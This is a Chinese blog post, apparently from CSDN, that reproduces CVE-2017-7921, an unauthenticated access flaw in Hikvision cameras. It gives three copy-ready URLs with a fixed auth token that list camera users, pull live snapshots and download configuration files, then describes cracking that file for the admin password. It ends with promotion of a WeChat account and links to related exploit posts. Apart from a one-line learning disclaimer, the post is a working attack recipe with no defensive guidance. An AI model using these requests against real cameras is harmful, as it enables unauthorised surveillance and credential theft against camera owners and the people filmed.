CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
注:此教程仅供学习参考,不涉及任何以破坏为目的的违法犯罪,个人行为与作者无关。
一、漏洞描述
1.这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
二、漏洞复现
1.在web浏览器中输入以下代码来检索用户与用户列
http://摄像头IP地址/Security/users?auth=YWRtaW46MTEK
2.在没有进行登录的情况下获取监控快照
http://摄像头IP地址/onvif-http/snapshot?auth=YWRtaW46MTEK
3.下载摄像头配置文件
http://摄像头IP地址/System/configurationFile?auth=YWRtaW46MTEK
4.用python脚本对配置文件进行破解(脚本放在结尾)
5.验证密码是否正确
关注微信公众号菜鸟学渗透后台回复CVE-2017-7921获取脚本
得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我!
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现相关推荐
- CVE(2017-15715、2021-41773、2021-40438)漏洞复现
仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...
- HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)
2023年将会持续于B站.CSDN等各大平台更新,可加入粉丝群与博主交流:838681355,为了老板大G共同努力. 页面: POC: PUT /SDK/webLanguage HTTP/1.1 Ho ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 海康威视iVMS系统在野 0day漏洞复现
漏洞概述 简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshe ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...
- 海康摄像头CVE-2021-36260漏洞复现
海康摄像头CVE-2021-36260漏洞复现 1.漏洞介绍 2.手动测试 2.1.摄像头版本 2.2.漏洞复现 2.2.1.更改URL 2.2.2.抓包修改数据 2.2.3.更换请求路径 2.2.4 ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
- java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
最新文章
- mysql 上一条_mysql选择上一条、下一条数据记录
- python编程工具是什么_python编程应该用什么工具
- flash调用swf文件服务器,浏览器如何加载Flash文件? (SWF)
- 钉钉微应用怎么进入_钉钉微应用如何打开本地app (Android)-问答-阿里云开发者社区-阿里云...
- opencv 伽马变换
- Ajax专题:异步交互局部刷新初步
- IDEA中使用SVN IDEA配置SVN步骤(git也是)
- wpf listview 大数据界面刷新
- 万兆局域网方案_局域网组建实施方案.doc
- mysql5.464位下载_MySQL Front 64位
- 在 X11 中实现 GTK+ 3 的 OpenGL 支持
- AD10 BOM制作
- 利用百度地图开放平台的Web API实现检索定位
- 扁豆凝集素LCA/LcH填料/小扁豆凝集素-琼脂糖凝胶/双花扁豆凝集素DBA/黑皮扁豆凝集素
- 一套asp.net开发的快递单打印系统源码
- 帮你抢小游戏流量红利——360小游戏接入指南
- 医疗器械生物相容性评价
- 【微信小程序】关于使用ECharts制作图表
- 高斯朴素贝叶斯分类的原理解释和手写代码实现
- 六星教育python怎么样_怎么样才能学好Python?六星教育把最简单的方法告诉你